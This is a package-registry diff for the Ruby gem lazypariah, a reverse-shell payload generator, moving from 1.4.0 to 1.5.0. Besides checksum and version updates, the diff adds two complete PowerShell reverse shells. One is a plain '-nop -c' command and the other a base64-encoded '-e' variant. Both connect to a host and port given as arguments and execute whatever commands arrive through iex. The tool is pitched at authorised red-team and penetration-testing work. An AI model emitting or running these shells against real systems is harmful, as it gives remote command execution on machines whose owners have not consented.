lazypariah 1.4.0 → 1.5.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/bin/lazypariah +17 -5
- metadata +2 -2
    
        checksums.yaml
    CHANGED
    
    | @@ -1,7 +1,7 @@ | |
| 1 1 | 
             
            ---
         | 
| 2 2 | 
             
            SHA256:
         | 
| 3 | 
            -
              metadata.gz:  | 
| 4 | 
            -
              data.tar.gz:  | 
| 3 | 
            +
              metadata.gz: c0415b7ada0a672425d133c83aa85cb221fc810c0fda582adf78e43482a95f5d
         | 
| 4 | 
            +
              data.tar.gz: d26a608deff75da4ffb97addd17c99eca931f72912f6e5f09cc3a7f4ed62ebd4
         | 
| 5 5 | 
             
            SHA512:
         | 
| 6 | 
            -
              metadata.gz:  | 
| 7 | 
            -
              data.tar.gz:  | 
| 6 | 
            +
              metadata.gz: c319312e49840ac97f81d5455b583049663f973ed3b1b09e5e2b5efd0ebb15ee223846685660ce2aea155c597fb8b81bff07aa395230035884619ba4e3d507ac
         | 
| 7 | 
            +
              data.tar.gz: 442031f46bcf78387803cbf6df0411465dc4be0cdd0e28009d07b54421fed3c4a4fbf302adbf74484cd75ec3f5e57564943b6fae1c9f745c3e62619207fc38d1
         | 
    
        data/bin/lazypariah
    CHANGED
    
    | @@ -1,13 +1,13 @@ | |
| 1 1 | 
             
            #!/usr/bin/env ruby
         | 
| 2 2 | 
             
            #
         | 
| 3 3 | 
             
            # Title: LAZYPARIAH
         | 
| 4 | 
            -
            # Version: 1. | 
| 4 | 
            +
            # Version: 1.5.0
         | 
| 5 5 | 
             
            # Description:
         | 
| 6 6 | 
             
            #	LAZYPARIAH is a simple tool for generating various reverse shell payloads
         | 
| 7 7 | 
             
            #	on the fly. It is intended to be used only in authorised circumstances by
         | 
| 8 8 | 
             
            #	qualified penetration testers, security researchers and red team professionals.
         | 
| 9 9 | 
             
            #
         | 
| 10 | 
            -
            # Copyright (C) 2020- | 
| 10 | 
            +
            # Copyright (C) 2020-2022 Peter Bruce Funnell
         | 
| 11 11 | 
             
            #
         | 
| 12 12 | 
             
            # This program is free software: you can redistribute it and/or modify it under the terms of the GNU
         | 
| 13 13 | 
             
            # General Public License as published by the Free Software Foundation, either version 3 of the License,
         | 
| @@ -29,7 +29,7 @@ require "stringio" | |
| 29 29 |  | 
| 30 30 | 
             
            # Define constants.
         | 
| 31 31 | 
             
            PROGRAM_NAME = "LAZYPARIAH".freeze()
         | 
| 32 | 
            -
            PROGRAM_VERSION = "1. | 
| 32 | 
            +
            PROGRAM_VERSION = "1.5.0".freeze()
         | 
| 33 33 | 
             
            EXECUTABLE_NAME = "lazypariah".freeze()
         | 
| 34 34 |  | 
| 35 35 | 
             
            # Define payload list.
         | 
| @@ -65,7 +65,9 @@ PAYLOAD_LIST = [ | |
| 65 65 | 
             
            	"java_class",
         | 
| 66 66 | 
             
            	"c_binary",
         | 
| 67 67 | 
             
            	"rust_binary",
         | 
| 68 | 
            -
            	"nc_openbsd"
         | 
| 68 | 
            +
            	"nc_openbsd",
         | 
| 69 | 
            +
            	"powershell_c",
         | 
| 70 | 
            +
            	"powershell_b64"
         | 
| 69 71 | 
             
            ].sort()
         | 
| 70 72 |  | 
| 71 73 | 
             
            # Define dictionary of payload aliases for backwards compatibility with versions < 1.0.0.
         | 
| @@ -106,7 +108,7 @@ PAYLOAD_BC_DICT = { | |
| 106 108 | 
             
            # Define function for displaying program information.
         | 
| 107 109 | 
             
            def prog_info(donation_info=true)
         | 
| 108 110 | 
             
            	puts("#{PROGRAM_NAME} #{PROGRAM_VERSION}")
         | 
| 109 | 
            -
            	puts("Copyright (C) 2020- | 
| 111 | 
            +
            	puts("Copyright (C) 2020-2022 Peter Bruce Funnell")
         | 
| 110 112 | 
             
            	if donation_info
         | 
| 111 113 | 
             
            		puts("\nBTC Donation Address (Author): 3EdoXV1w8H7y7M9ZdpjRC7GPnX4aouy18g")
         | 
| 112 114 | 
             
            	end
         | 
| @@ -517,6 +519,16 @@ begin | |
| 517 519 | 
             
            				end
         | 
| 518 520 |  | 
| 519 521 | 
             
            				system("rm -r #{temp_dir}")
         | 
| 522 | 
            +
            			when "powershell_c"
         | 
| 523 | 
            +
            				# Simple reverse shell in Powershell.
         | 
| 524 | 
            +
            				#print_output(s: "powershell -nop -c \"$t = New-Object System.Net.Sockets.TCPClient('#{ARGV[1]}', #{ARGV[2]}); $s = $t.GetStream(); [byte[]]$b = 0..65535|%{0}; while(($i = $s.Read($b, 0, $b.Length)) -ne 0){; $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b, 0, $i); $r = (IEX $d 2>&1 | Out-String); $r2 = $r + 'PS '+(pwd).Path+'> '; $rb = ([text.encoding]::ASCII).GetBytes($r2); $s.Write($rb, 0, $rb.Length); $s.Flush()}; $t.Close();\"", url_encode: url_encode, new_line: !arguments[:"no-new-line"])
         | 
| 525 | 
            +
            				code = "$client = New-Object System.Net.Sockets.TCPClient('#{ARGV[1]}',#{ARGV[2]});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
         | 
| 526 | 
            +
            				command = "powershell -nop -c \"#{code}\""
         | 
| 527 | 
            +
            				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
         | 
| 528 | 
            +
            			when "powershell_b64"
         | 
| 529 | 
            +
            				code = "$client = New-Object System.Net.Sockets.TCPClient('#{ARGV[1]}',#{ARGV[2]});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()".encode("utf-16le")
         | 
| 530 | 
            +
            				command = "powershell -e #{Base64.strict_encode64(code)}"
         | 
| 531 | 
            +
            				print_output(s: command, url_encode: url_encode, new_line: !arguments[:"no-new-line"])
         | 
| 520 532 | 
             
            			end
         | 
| 521 533 | 
             
            		end
         | 
| 522 534 | 
             
            	end
         | 
    
        metadata
    CHANGED
    
    | @@ -1,14 +1,14 @@ | |
| 1 1 | 
             
            --- !ruby/object:Gem::Specification
         | 
| 2 2 | 
             
            name: lazypariah
         | 
| 3 3 | 
             
            version: !ruby/object:Gem::Version
         | 
| 4 | 
            -
              version: 1. | 
| 4 | 
            +
              version: 1.5.0
         | 
| 5 5 | 
             
            platform: ruby
         | 
| 6 6 | 
             
            authors:
         | 
| 7 7 | 
             
            - Peter Funnell
         | 
| 8 8 | 
             
            autorequire:
         | 
| 9 9 | 
             
            bindir: bin
         | 
| 10 10 | 
             
            cert_chain: []
         | 
| 11 | 
            -
            date:  | 
| 11 | 
            +
            date: 2022-01-11 00:00:00.000000000 Z
         | 
| 12 12 | 
             
            dependencies: []
         | 
| 13 13 | 
             
            description: LAZYPARIAH is a simple tool for generating a range of reverse shell payloads
         | 
| 14 14 | 
             
              on the fly. It is intended to be used only in authorised circumstances by qualified
         |